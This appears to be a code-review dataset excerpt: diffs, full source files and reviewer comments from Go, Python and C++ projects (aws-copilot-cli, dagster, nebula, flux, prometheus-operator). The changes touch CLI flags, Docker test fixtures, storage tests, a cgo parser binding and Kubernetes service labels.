return opts.Execute() }), } cmd.Flags().StringVarP(&vars.appName, appFlag, appFlagShort, tryReadingAppName(), appFlagDescription) cmd.Flags().StringVarP(&vars.name, nameFlag, nameFlagShort, "", envFlagDescription) cmd.Flags().StringVar(&vars.profile, profileFlag, "", profileFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.AccessKeyID, accessKeyIDFlag, "", accessKeyIDFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.SecretAccessKey, secretAccessKeyFlag, "", secretAccessKeyFlagDescription) cmd.Flags().StringVar(&vars.tempCreds.SessionToken, sessionTokenFlag, "", sessionTokenFlagDescription) cmd.Flags().StringVar(&vars.region, regionFlag, "", envRegionTokenFlagDescription) cmd.Flags().BoolVar(&vars.isProduction, prodEnvFlag, false, prodEnvFlagDescription) cmd.Flags().StringVar(&vars.importVPC.ID, vpcIDFlag, "", vpcIDFlagDescription) cmd.Flags().StringSliceVar(&vars.importVPC.PublicSubnetIDs, publicSubnetsFlag, nil, publicSubnetsFlagDescription) cmd.Flags().StringSliceVar(&vars.importVPC.PrivateSubnetIDs, privateSubnetsFlag, nil, privateSubnetsFlagDescription) cmd.Flags().IPNetVar(&vars.adjustVPC.CIDR, vpcCIDRFlag, net.IPNet{}, vpcCIDRFlagDescription) // TODO: use IPNetSliceVar when it is available (https://github.com/spf13/pflag/issues/273). 
cmd.Flags().StringSliceVar(&vars.adjustVPC.PublicSubnetCIDRs, publicSubnetCIDRsFlag, nil, publicSubnetCIDRsFlagDescription) cmd.Flags().StringSliceVar(&vars.adjustVPC.PrivateSubnetCIDRs, privateSubnetCIDRsFlag, nil, privateSubnetCIDRsFlagDescription) cmd.Flags().BoolVar(&vars.defaultConfig, defaultConfigFlag, false, defaultConfigFlagDescription) flags := pflag.NewFlagSet("Common", pflag.ContinueOnError) flags.AddFlag(cmd.Flags().Lookup(appFlag)) flags.AddFlag(cmd.Flags().Lookup(nameFlag)) flags.AddFlag(cmd.Flags().Lookup(profileFlag)) flags.AddFlag(cmd.Flags().Lookup(accessKeyIDFlag)) flags.AddFlag(cmd.Flags().Lookup(secretAccessKeyFlag)) flags.AddFlag(cmd.Flags().Lookup(sessionTokenFlag)) flags.AddFlag(cmd.Flags().Lookup(regionFlag)) flags.AddFlag(cmd.Flags().Lookup(defaultConfigFlag)) flags.AddFlag(cmd.Flags().Lookup(prodEnvFlag)) resourcesImportFlag := pflag.NewFlagSet("Import Existing Resources", pflag.ContinueOnError) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(vpcIDFlag)) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(publicSubnetsFlag)) resourcesImportFlag.AddFlag(cmd.Flags().Lookup(privateSubnetsFlag)) resourcesConfigFlag := pflag.NewFlagSet("Configure Default Resources", pflag.ContinueOnError) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(vpcCIDRFlag)) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(publicSubnetCIDRsFlag)) resourcesConfigFlag.AddFlag(cmd.Flags().Lookup(privateSubnetCIDRsFlag)) cmd.Annotations = map[string]string{ // The order of the sections we want to display. "sections": "Common,Import Existing Resources,Configure Default Resources", "Common": flags.FlagUsages(), "Import Existing Resources": resourcesImportFlag.FlagUsages(), "Configure Default Resources": resourcesConfigFlag.FlagUsages(), } cmd.SetUsageTemplate(`{{h1 "Usage"}}{{if .Runnable}} {{.UseLine}}{{end}}{{$annotations := .Annotations}}{{$sections := split .Annotations.sections ","}}{{if gt (len $sections) 0}} {{range $i, $sectionName := $sections}}{{h1 (print $sectionName " Flags")}} {{(index $annotations $sectionName) | trimTrailingWhitespaces}}{{if ne (inc $i) (len $sections)}} {{end}}{{end}}{{end}}{{if .HasAvailableInheritedFlags}} {{h1 "Global Flags"}} {{.InheritedFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasExample}} {{h1 "Examples"}}{{code .Example}}{{end}} `) return cmd }
1
17,620
can we update this to a `log.Warningf`?
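The comment above asks for the silently dropped `DeleteRole` error in `tryDeletingEnvRoles` to be surfaced as a warning. Below is a minimal, self-contained sketch of that pattern; it is not Copilot's actual code: `iamClient` is a stand-in for the real IAM wrapper, the role-name format is illustrative, and the standard-library logger is used because the exact signature of Copilot's internal `log.Warningf` helper is assumed from the comment rather than verified.

```go
package main

import (
	"errors"
	"fmt"
	"log"
)

// iamClient is a stand-in for the IAM wrapper the command uses.
type iamClient struct{}

// DeleteRole pretends one role cannot be deleted so the warning path is exercised.
func (iamClient) DeleteRole(name string) error {
	if name == "demo-test-EnvManagerRole" {
		return errors.New("role has attached policies")
	}
	return nil
}

// tryDeletingEnvRoles mirrors the best-effort cleanup, but surfaces failures
// as warnings instead of discarding them.
func tryDeletingEnvRoles(iam iamClient, app, env string) {
	roleNames := []string{
		fmt.Sprintf("%s-%s-CFNExecutionRole", app, env),
		fmt.Sprintf("%s-%s-EnvManagerRole", app, env),
	}
	for _, roleName := range roleNames {
		if err := iam.DeleteRole(roleName); err != nil {
			// Copilot would presumably call its own log.Warningf here; the
			// stdlib logger keeps this sketch self-contained and runnable.
			log.Printf("WARN: failed to delete IAM role %s: %v", roleName, err)
		}
	}
}

func main() {
	tryDeletingEnvRoles(iamClient{}, "demo", "test")
}
```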
aws-copilot-cli
go
@@ -105,7 +105,11 @@ def connect_container_to_network(container, network): def disconnect_container_from_network(container, network): - subprocess.check_call(["docker", "network", "disconnect", network, container]) + # subprocess.run instead of subprocess.check_call so we don't fail when + # trying to disconnect a container from a network that it's not connected to + subprocess.run( # pylint: disable=subprocess-run-check + ["docker", "network", "disconnect", network, container] + ) def hostnames(network):
1
# pylint: disable=redefined-outer-name import json import os import subprocess from contextlib import contextmanager import pytest from .utils import BUILDKITE @pytest.fixture(scope="module") def docker_compose_cm(test_directory): @contextmanager def docker_compose( docker_compose_yml=None, network_name=None, docker_context=None, service=None, ): if not docker_compose_yml: docker_compose_yml = default_docker_compose_yml(test_directory) if not network_name: network_name = network_name_from_yml(docker_compose_yml) try: docker_compose_up(docker_compose_yml, docker_context, service) if BUILDKITE: # When running in a container on Buildkite, we need to first connect our container # and our network and then yield a dict of container name to the container's # hostname. with buildkite_hostnames_cm(network_name) as hostnames: yield hostnames else: # When running locally, we don't need to jump through any special networking hoops; # just yield a dict of container name to "localhost". yield dict((container, "localhost") for container in list_containers()) finally: docker_compose_down(docker_compose_yml, docker_context, service) return docker_compose @pytest.fixture def docker_compose(docker_compose_cm): with docker_compose_cm() as docker_compose: yield docker_compose def docker_compose_up(docker_compose_yml, context, service): if context: compose_command = ["docker", "--context", context, "compose"] else: compose_command = ["docker-compose"] compose_command += [ "--file", str(docker_compose_yml), "up", "--detach", ] if service: compose_command.append(service) subprocess.check_call(compose_command) def docker_compose_down(docker_compose_yml, context, service): if context: compose_command = ["docker", "--context", context, "compose"] else: compose_command = ["docker-compose"] compose_command += ["--file", str(docker_compose_yml), "down", "--volumes", "--remove-orphans"] if service: compose_command.append(service) subprocess.check_call(compose_command) def list_containers(): # TODO: Handle default container names: {project_name}_service_{task_number} return subprocess.check_output(["docker", "ps", "--format", "{{.Names}}"]).decode().splitlines() def current_container(): container_id = subprocess.check_output(["cat", "/etc/hostname"]).strip().decode() container = ( subprocess.check_output( ["docker", "ps", "--filter", f"id={container_id}", "--format", "{{.Names}}"] ) .strip() .decode() ) return container def connect_container_to_network(container, network): # subprocess.run instead of subprocess.check_call so we don't fail when # trying to connect a container to a network that it's already connected to subprocess.run( # pylint: disable=subprocess-run-check ["docker", "network", "connect", network, container] ) def disconnect_container_from_network(container, network): subprocess.check_call(["docker", "network", "disconnect", network, container]) def hostnames(network): hostnames = {} for container in list_containers(): output = subprocess.check_output(["docker", "inspect", container]) networking = json.loads(output)[0]["NetworkSettings"] hostname = networking["Networks"].get(network, {}).get("IPAddress") if hostname: hostnames[container] = hostname return hostnames @contextmanager def buildkite_hostnames_cm(network): container = current_container() try: connect_container_to_network(container, network) yield hostnames(network) finally: disconnect_container_from_network(container, network) def default_docker_compose_yml(default_directory): if os.path.isfile("docker-compose.yml"): return 
os.path.join(os.getcwd(), "docker-compose.yml") else: return os.path.join(default_directory, "docker-compose.yml") def network_name_from_yml(docker_compose_yml): dirname = os.path.dirname(docker_compose_yml) basename = os.path.basename(dirname) return basename + "_default"
1
18,298
can we get something emitted in the logs on non-zero exits, so there's something to trace back to when problems like this fail on the first invocation?
dagster-io-dagster
py
@@ -20,9 +20,10 @@ namespace storage { TEST(DeleteVertexTest, SimpleTest) { fs::TempDir rootPath("/tmp/DeleteVertexTest.XXXXXX"); std::unique_ptr<kvstore::KVStore> kv(TestUtils::initKV(rootPath.path())); + auto schemaMan = TestUtils::mockSchemaMan(); // Add vertices { - auto* processor = AddVerticesProcessor::instance(kv.get(), nullptr, nullptr); + auto* processor = AddVerticesProcessor::instance(kv.get(), schemaMan.get(), nullptr); cpp2::AddVerticesRequest req; req.space_id = 0; req.overwritable = false;
1
/* Copyright (c) 2019 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "base/Base.h" #include <gtest/gtest.h> #include <rocksdb/db.h> #include "fs/TempDir.h" #include "storage/test/TestUtils.h" #include "storage/mutate/DeleteVertexProcessor.h" #include "storage/mutate/AddVerticesProcessor.h" #include "base/NebulaKeyUtils.h" namespace nebula { namespace storage { TEST(DeleteVertexTest, SimpleTest) { fs::TempDir rootPath("/tmp/DeleteVertexTest.XXXXXX"); std::unique_ptr<kvstore::KVStore> kv(TestUtils::initKV(rootPath.path())); // Add vertices { auto* processor = AddVerticesProcessor::instance(kv.get(), nullptr, nullptr); cpp2::AddVerticesRequest req; req.space_id = 0; req.overwritable = false; // partId => List<Vertex> for (auto partId = 0; partId < 3; partId++) { std::vector<cpp2::Vertex> vertices; for (auto vertexId = partId * 10; vertexId < 10 * (partId + 1); vertexId++) { std::vector<cpp2::Tag> tags; for (auto tagId = 0; tagId < 10; tagId++) { tags.emplace_back(apache::thrift::FragileConstructor::FRAGILE, tagId, folly::stringPrintf("%d_%d_%d", partId, vertexId, tagId)); } vertices.emplace_back(apache::thrift::FragileConstructor::FRAGILE, vertexId, std::move(tags)); } req.parts.emplace(partId, std::move(vertices)); } auto fut = processor->getFuture(); processor->process(req); auto resp = std::move(fut).get(); EXPECT_EQ(0, resp.result.failed_codes.size()); for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto prefix = NebulaKeyUtils::vertexPrefix(partId, vertexId); std::unique_ptr<kvstore::KVIterator> iter; EXPECT_EQ(kvstore::ResultCode::SUCCEEDED, kv->prefix(0, partId, prefix, &iter)); TagID tagId = 0; while (iter->valid()) { EXPECT_EQ(folly::stringPrintf("%d_%d_%d", partId, vertexId, tagId), iter->val()); tagId++; iter->next(); } EXPECT_EQ(10, tagId); } } } // Delete vertices { for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto* processor = DeleteVertexProcessor::instance(kv.get(), nullptr, nullptr); cpp2::DeleteVertexRequest req; req.set_space_id(0); req.set_part_id(partId); req.set_vid(vertexId); auto fut = processor->getFuture(); processor->process(req); auto resp = std::move(fut).get(); EXPECT_EQ(0, resp.result.failed_codes.size()); } } } for (auto partId = 0; partId < 3; partId++) { for (auto vertexId = 10 * partId; vertexId < 10 * (partId + 1); vertexId++) { auto prefix = NebulaKeyUtils::vertexPrefix(partId, vertexId); std::unique_ptr<kvstore::KVIterator> iter; EXPECT_EQ(kvstore::ResultCode::SUCCEEDED, kv->prefix(0, partId, prefix, &iter)); CHECK(!iter->valid()); } } } } // namespace storage } // namespace nebula int main(int argc, char** argv) { testing::InitGoogleTest(&argc, argv); folly::init(&argc, &argv, true); google::SetStderrLogging(google::INFO); return RUN_ALL_TESTS(); }
1
25,336
Do we need the `schema manager` here?
vesoft-inc-nebula
cpp
@@ -0,0 +1,19 @@ +package parser + +//go:generate cargo build --release + +// #cgo LDFLAGS: -L${SRCDIR}/target/release -ldl -Wl,-Bstatic -lflux_parser -Wl,-Bdynamic +// #include <stdlib.h> +// void flux_parse_json(const char*); +import "C" + +import ( + "unsafe" +) + +func Parse(input string) { + cstr := C.CString(input) + defer C.free(unsafe.Pointer(cstr)) + + C.flux_parse_json(cstr) +}
1
1
12,039
This won't work because of the permissions on the directory when this is included as a library. But we may be able to do this. The key would be wrapping this command with either a script or a Go binary that ensures the current directory is writable. If the current directory is not writable, it would attempt to make it writable so that we could write out the produced binary. But I'm not sure whether that would influence the hash recorded in `go.sum`, since I don't know how that hash is calculated. Alternatively, we can choose a place in `/usr/local`, or choose a location that is writable in the Go cache and use that. I'll give that a try, since it might be needed for the ARM builds if we choose to only include `x86_64` precompiled binaries in the module.
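A minimal sketch of the writable-directory check described above, assuming nothing about Flux's actual build scripts: probe the source directory by creating a temporary file, and fall back to a directory under the user cache dir (a hypothetical location, not necessarily the one Flux would pick) when the module is mounted read-only.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// isWritable reports whether files can be created in dir by actually trying to.
func isWritable(dir string) bool {
	f, err := os.CreateTemp(dir, ".writecheck-*")
	if err != nil {
		return false
	}
	name := f.Name()
	f.Close()
	os.Remove(name)
	return true
}

// buildDir returns srcDir if it is writable, otherwise a per-module directory
// under the user cache dir (an illustrative fallback, not Flux's actual choice).
func buildDir(srcDir string) (string, error) {
	if isWritable(srcDir) {
		return srcDir, nil
	}
	cache, err := os.UserCacheDir()
	if err != nil {
		return "", err
	}
	dir := filepath.Join(cache, "flux_parser", "target")
	if err := os.MkdirAll(dir, 0o755); err != nil {
		return "", err
	}
	return dir, nil
}

func main() {
	dir, err := buildDir(".")
	if err != nil {
		fmt.Fprintln(os.Stderr, "no writable build dir:", err)
		os.Exit(1)
	}
	fmt.Println("building into:", dir)
}
```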
influxdata-flux
go
@@ -153,6 +153,8 @@ func (r *REPL) executeLine(t string) (values.Value, error) { return nil, err } + r.scope.SetReturn(nil) + if _, err := r.interpreter.Eval(semPkg, r.scope, flux.StdLib()); err != nil { return nil, err }
1
// Package repl implements the read-eval-print-loop for the command line flux query console. package repl import ( "context" "fmt" "io/ioutil" "os" "os/signal" "path/filepath" "sort" "strings" "sync" "syscall" "github.com/influxdata/flux/ast" prompt "github.com/c-bata/go-prompt" "github.com/influxdata/flux" "github.com/influxdata/flux/execute" "github.com/influxdata/flux/interpreter" "github.com/influxdata/flux/lang" "github.com/influxdata/flux/parser" "github.com/influxdata/flux/semantic" "github.com/influxdata/flux/values" ) type REPL struct { interpreter *interpreter.Interpreter scope interpreter.Scope querier Querier cancelMu sync.Mutex cancelFunc context.CancelFunc } type Querier interface { Query(ctx context.Context, compiler flux.Compiler) (flux.ResultIterator, error) } func New(q Querier) *REPL { return &REPL{ interpreter: interpreter.NewInterpreter(), scope: flux.Prelude(), querier: q, } } func (r *REPL) Run() { p := prompt.New( r.input, r.completer, prompt.OptionPrefix("> "), prompt.OptionTitle("flux"), ) sigs := make(chan os.Signal, 1) signal.Notify(sigs, syscall.SIGINT) go func() { for range sigs { r.cancel() } }() p.Run() } func (r *REPL) cancel() { r.cancelMu.Lock() defer r.cancelMu.Unlock() if r.cancelFunc != nil { r.cancelFunc() r.cancelFunc = nil } } func (r *REPL) setCancel(cf context.CancelFunc) { r.cancelMu.Lock() defer r.cancelMu.Unlock() r.cancelFunc = cf } func (r *REPL) clearCancel() { r.setCancel(nil) } func (r *REPL) completer(d prompt.Document) []prompt.Suggest { names := make([]string, 0, r.scope.Size()) r.scope.Range(func(k string, v values.Value) { names = append(names, k) }) sort.Strings(names) s := make([]prompt.Suggest, 0, len(names)) for _, n := range names { if n == "_" || !strings.HasPrefix(n, "_") { s = append(s, prompt.Suggest{Text: n}) } } if d.Text == "" || strings.HasPrefix(d.Text, "@") { root := "./" + strings.TrimPrefix(d.Text, "@") fluxFiles, err := getFluxFiles(root) if err == nil { for _, fName := range fluxFiles { s = append(s, prompt.Suggest{Text: "@" + fName}) } } dirs, err := getDirs(root) if err == nil { for _, fName := range dirs { s = append(s, prompt.Suggest{Text: "@" + fName + string(os.PathSeparator)}) } } } return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) } func (r *REPL) Input(t string) error { _, err := r.executeLine(t) return err } // input processes a line of input and prints the result. func (r *REPL) input(t string) { v, err := r.executeLine(t) if err != nil { fmt.Println("Error:", err) } else if v != nil { fmt.Println(v) } } // executeLine processes a line of input. // If the input evaluates to a valid value, that value is returned. 
func (r *REPL) executeLine(t string) (values.Value, error) { if t == "" { return nil, nil } if t[0] == '@' { q, err := LoadQuery(t) if err != nil { return nil, err } t = q } astPkg := parser.ParseSource(t) if ast.Check(astPkg) > 0 { return nil, ast.GetError(astPkg) } semPkg, err := semantic.New(astPkg) if err != nil { return nil, err } if _, err := r.interpreter.Eval(semPkg, r.scope, flux.StdLib()); err != nil { return nil, err } v := r.scope.Return() // Ignore statements that do not return a value if v == nil { return nil, nil } // Check for yield and execute query if v.Type() == flux.TableObjectMonoType { t := v.(*flux.TableObject) now, ok := r.scope.Lookup("now") if !ok { return nil, fmt.Errorf("now option not set") } nowTime, err := now.Function().Call(nil) if err != nil { return nil, err } spec, err := flux.ToSpec([]values.Value{t}, nowTime.Time().Time()) if err != nil { return nil, err } return nil, r.doQuery(spec) } // Print value if v.Type() != semantic.Invalid { return v, nil } return nil, nil } func (r *REPL) doQuery(spec *flux.Spec) error { // Setup cancel context ctx, cancelFunc := context.WithCancel(context.Background()) r.setCancel(cancelFunc) defer cancelFunc() defer r.clearCancel() compiler := lang.SpecCompiler{ Spec: spec, } results, err := r.querier.Query(ctx, compiler) if err != nil { return err } defer results.Release() for results.More() { result := results.Next() tables := result.Tables() fmt.Println("Result:", result.Name()) err := tables.Do(func(tbl flux.Table) error { _, err := execute.NewFormatter(tbl, nil).WriteTo(os.Stdout) return err }) if err != nil { return err } } return results.Err() } func getFluxFiles(path string) ([]string, error) { return filepath.Glob(path + "*.flux") } func getDirs(path string) ([]string, error) { dir := filepath.Dir(path) files, err := ioutil.ReadDir(dir) if err != nil { return nil, err } dirs := make([]string, 0, len(files)) for _, f := range files { if f.IsDir() { dirs = append(dirs, filepath.Join(dir, f.Name())) } } return dirs, nil } // LoadQuery returns the Flux query q, except for two special cases: // if q is exactly "-", the query will be read from stdin; // and if the first character of q is "@", // the @ prefix is removed and the contents of the file specified by the rest of q are returned. func LoadQuery(q string) (string, error) { if q == "-" { data, err := ioutil.ReadAll(os.Stdin) if err != nil { return "", err } return string(data), nil } if len(q) > 0 && q[0] == '@' { data, err := ioutil.ReadFile(q[1:]) if err != nil { return "", err } return string(data), nil } return q, nil }
1
9,624
Correct me if I'm wrong, but is this necessary? Why not just use the value returned by `interpreter.Eval` and not mess with the scope? `interpreter.Eval` will return any produced side effects. This means TableObjects as well as any value resulting from any expression statements.
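A schematic sketch of the suggestion above: consume what the evaluator returns instead of clearing and re-reading `scope.Return()` between REPL inputs. The exact return type of Flux's `interpreter.Eval` at this revision isn't verified here, so `evalLine` and `evalResult` below are placeholders that only illustrate the shape of the change.

```go
package main

import "fmt"

// evalResult stands in for whatever interpreter.Eval returns per evaluated
// statement (values and/or side effects); it is a placeholder, not Flux's API.
type evalResult struct {
	value interface{}
}

// evalLine is a stand-in evaluator that returns one result per statement.
func evalLine(src string) ([]evalResult, error) {
	return []evalResult{{value: src}}, nil
}

// executeLine uses the evaluator's return value directly, so no state on a
// shared scope has to be reset between inputs.
func executeLine(src string) (interface{}, error) {
	results, err := evalLine(src)
	if err != nil {
		return nil, err
	}
	if len(results) == 0 {
		return nil, nil // statements that do not produce a value
	}
	return results[len(results)-1].value, nil
}

func main() {
	v, err := executeLine(`1 + 1`)
	fmt.Println(v, err)
}
```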
influxdata-flux
go
@@ -162,12 +162,14 @@ func makeStatefulSetService(p *monitoringv1.Alertmanager, config Config) *v1.Ser p.Spec.PortName = defaultPortName } + labels := config.Labels.Merge(p.Spec.ServiceMetadata.Labels) + labels["operated-alertmanager"] = "true" + svc := &v1.Service{ ObjectMeta: metav1.ObjectMeta{ - Name: governingServiceName, - Labels: config.Labels.Merge(map[string]string{ - "operated-alertmanager": "true", - }), + Name: governingServiceName, + Labels: labels, + Annotations: p.Spec.ServiceMetadata.Annotations, OwnerReferences: []metav1.OwnerReference{ metav1.OwnerReference{ Name: p.GetName(),
1
// Copyright 2016 The prometheus-operator Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package alertmanager import ( "fmt" "net/url" "path" "strings" appsv1 "k8s.io/api/apps/v1" v1 "k8s.io/api/core/v1" "k8s.io/apimachinery/pkg/api/resource" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/util/intstr" "github.com/blang/semver" "github.com/pkg/errors" monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1" "github.com/prometheus-operator/prometheus-operator/pkg/k8sutil" "github.com/prometheus-operator/prometheus-operator/pkg/operator" ) const ( governingServiceName = "alertmanager-operated" defaultRetention = "120h" secretsDir = "/etc/alertmanager/secrets/" configmapsDir = "/etc/alertmanager/configmaps/" alertmanagerConfDir = "/etc/alertmanager/config" alertmanagerConfFile = alertmanagerConfDir + "/alertmanager.yaml" alertmanagerStorageDir = "/alertmanager" defaultPortName = "web" ) var ( minReplicas int32 = 1 probeTimeoutSeconds int32 = 3 ) func makeStatefulSet(am *monitoringv1.Alertmanager, old *appsv1.StatefulSet, config Config) (*appsv1.StatefulSet, error) { // TODO(fabxc): is this the right point to inject defaults? // Ideally we would do it before storing but that's currently not possible. // Potentially an update handler on first insertion. 
if am.Spec.PortName == "" { am.Spec.PortName = defaultPortName } if am.Spec.Replicas == nil { am.Spec.Replicas = &minReplicas } intZero := int32(0) if am.Spec.Replicas != nil && *am.Spec.Replicas < 0 { am.Spec.Replicas = &intZero } if am.Spec.Retention == "" { am.Spec.Retention = defaultRetention } if am.Spec.Resources.Requests == nil { am.Spec.Resources.Requests = v1.ResourceList{} } if _, ok := am.Spec.Resources.Requests[v1.ResourceMemory]; !ok { am.Spec.Resources.Requests[v1.ResourceMemory] = resource.MustParse("200Mi") } if am.Spec.ConfigSecret == "" { am.Spec.ConfigSecret = configSecretName(am.Name) } spec, err := makeStatefulSetSpec(am, config) if err != nil { return nil, err } boolTrue := true // do not transfer kubectl annotations to the statefulset so it is not // pruned by kubectl annotations := make(map[string]string) for key, value := range am.ObjectMeta.Annotations { if !strings.HasPrefix(key, "kubectl.kubernetes.io/") { annotations[key] = value } } statefulset := &appsv1.StatefulSet{ ObjectMeta: metav1.ObjectMeta{ Name: prefixedName(am.Name), Labels: config.Labels.Merge(am.ObjectMeta.Labels), Annotations: annotations, OwnerReferences: []metav1.OwnerReference{ { APIVersion: am.APIVersion, BlockOwnerDeletion: &boolTrue, Controller: &boolTrue, Kind: am.Kind, Name: am.Name, UID: am.UID, }, }, }, Spec: *spec, } if am.Spec.ImagePullSecrets != nil && len(am.Spec.ImagePullSecrets) > 0 { statefulset.Spec.Template.Spec.ImagePullSecrets = am.Spec.ImagePullSecrets } storageSpec := am.Spec.Storage if storageSpec == nil { statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, v1.Volume{ Name: volumeName(am.Name), VolumeSource: v1.VolumeSource{ EmptyDir: &v1.EmptyDirVolumeSource{}, }, }) } else if storageSpec.EmptyDir != nil { emptyDir := storageSpec.EmptyDir statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, v1.Volume{ Name: volumeName(am.Name), VolumeSource: v1.VolumeSource{ EmptyDir: emptyDir, }, }) } else { pvcTemplate := operator.MakeVolumeClaimTemplate(storageSpec.VolumeClaimTemplate) if pvcTemplate.Name == "" { pvcTemplate.Name = volumeName(am.Name) } if storageSpec.VolumeClaimTemplate.Spec.AccessModes == nil { pvcTemplate.Spec.AccessModes = []v1.PersistentVolumeAccessMode{v1.ReadWriteOnce} } else { pvcTemplate.Spec.AccessModes = storageSpec.VolumeClaimTemplate.Spec.AccessModes } pvcTemplate.Spec.Resources = storageSpec.VolumeClaimTemplate.Spec.Resources pvcTemplate.Spec.Selector = storageSpec.VolumeClaimTemplate.Spec.Selector statefulset.Spec.VolumeClaimTemplates = append(statefulset.Spec.VolumeClaimTemplates, *pvcTemplate) } if old != nil { statefulset.Annotations = old.Annotations } for _, volume := range am.Spec.Volumes { statefulset.Spec.Template.Spec.Volumes = append(statefulset.Spec.Template.Spec.Volumes, volume) } return statefulset, nil } func makeStatefulSetService(p *monitoringv1.Alertmanager, config Config) *v1.Service { if p.Spec.PortName == "" { p.Spec.PortName = defaultPortName } svc := &v1.Service{ ObjectMeta: metav1.ObjectMeta{ Name: governingServiceName, Labels: config.Labels.Merge(map[string]string{ "operated-alertmanager": "true", }), OwnerReferences: []metav1.OwnerReference{ metav1.OwnerReference{ Name: p.GetName(), Kind: p.Kind, APIVersion: p.APIVersion, UID: p.GetUID(), }, }, }, Spec: v1.ServiceSpec{ ClusterIP: "None", Ports: []v1.ServicePort{ { Name: p.Spec.PortName, Port: 9093, TargetPort: intstr.FromString(p.Spec.PortName), Protocol: v1.ProtocolTCP, }, { Name: "tcp-mesh", Port: 9094, 
TargetPort: intstr.FromInt(9094), Protocol: v1.ProtocolTCP, }, { Name: "udp-mesh", Port: 9094, TargetPort: intstr.FromInt(9094), Protocol: v1.ProtocolUDP, }, }, Selector: map[string]string{ "app": "alertmanager", }, }, } return svc } func makeStatefulSetSpec(a *monitoringv1.Alertmanager, config Config) (*appsv1.StatefulSetSpec, error) { // Before editing 'a' create deep copy, to prevent side effects. For more // details see https://github.com/prometheus-operator/prometheus-operator/issues/1659 a = a.DeepCopy() amBaseImage := operator.StringValOrDefault(a.Spec.BaseImage, operator.DefaultAlertmanagerBaseImage) amVersion := operator.StringValOrDefault(a.Spec.Version, operator.DefaultAlertmanagerVersion) amTag := operator.StringValOrDefault(a.Spec.Tag, "") amSHA := operator.StringValOrDefault(a.Spec.SHA, "") amImagePath, err := operator.BuildImagePath(amBaseImage, amVersion, amTag, amSHA) if err != nil { return nil, errors.Wrap(err, "failed to build image path") } if a.Spec.Image != nil && strings.TrimSpace(*a.Spec.Image) != "" { amImagePath = *a.Spec.Image } version, err := semver.ParseTolerant(amVersion) if err != nil { return nil, errors.Wrap(err, "failed to parse alertmanager version") } amArgs := []string{ fmt.Sprintf("--config.file=%s", alertmanagerConfFile), fmt.Sprintf("--storage.path=%s", alertmanagerStorageDir), fmt.Sprintf("--data.retention=%s", a.Spec.Retention), } if *a.Spec.Replicas == 1 && !a.Spec.ForceEnableClusterMode { amArgs = append(amArgs, "--cluster.listen-address=") } else { amArgs = append(amArgs, "--cluster.listen-address=[$(POD_IP)]:9094") } if a.Spec.ListenLocal { amArgs = append(amArgs, "--web.listen-address=127.0.0.1:9093") } else { amArgs = append(amArgs, "--web.listen-address=:9093") } if a.Spec.ExternalURL != "" { amArgs = append(amArgs, "--web.external-url="+a.Spec.ExternalURL) } webRoutePrefix := "/" if a.Spec.RoutePrefix != "" { webRoutePrefix = a.Spec.RoutePrefix } amArgs = append(amArgs, fmt.Sprintf("--web.route-prefix=%v", webRoutePrefix)) if a.Spec.LogLevel != "" && a.Spec.LogLevel != "info" { amArgs = append(amArgs, fmt.Sprintf("--log.level=%s", a.Spec.LogLevel)) } if version.GTE(semver.MustParse("0.16.0")) { if a.Spec.LogFormat != "" && a.Spec.LogFormat != "logfmt" { amArgs = append(amArgs, fmt.Sprintf("--log.format=%s", a.Spec.LogFormat)) } } if a.Spec.ClusterAdvertiseAddress != "" { amArgs = append(amArgs, fmt.Sprintf("--cluster.advertise-address=%s", a.Spec.ClusterAdvertiseAddress)) } localReloadURL := &url.URL{ Scheme: "http", Host: config.LocalHost + ":9093", Path: path.Clean(webRoutePrefix + "/-/reload"), } livenessProbeHandler := v1.Handler{ HTTPGet: &v1.HTTPGetAction{ Path: path.Clean(webRoutePrefix + "/-/healthy"), Port: intstr.FromString(a.Spec.PortName), }, } readinessProbeHandler := v1.Handler{ HTTPGet: &v1.HTTPGetAction{ Path: path.Clean(webRoutePrefix + "/-/ready"), Port: intstr.FromString(a.Spec.PortName), }, } var livenessProbe *v1.Probe var readinessProbe *v1.Probe if !a.Spec.ListenLocal { livenessProbe = &v1.Probe{ Handler: livenessProbeHandler, TimeoutSeconds: probeTimeoutSeconds, FailureThreshold: 10, } readinessProbe = &v1.Probe{ Handler: readinessProbeHandler, InitialDelaySeconds: 3, TimeoutSeconds: 3, PeriodSeconds: 5, FailureThreshold: 10, } } podAnnotations := map[string]string{} podLabels := map[string]string{} podSelectorLabels := map[string]string{ "app": "alertmanager", "alertmanager": a.Name, } if a.Spec.PodMetadata != nil { if a.Spec.PodMetadata.Labels != nil { for k, v := range a.Spec.PodMetadata.Labels { podLabels[k] = v 
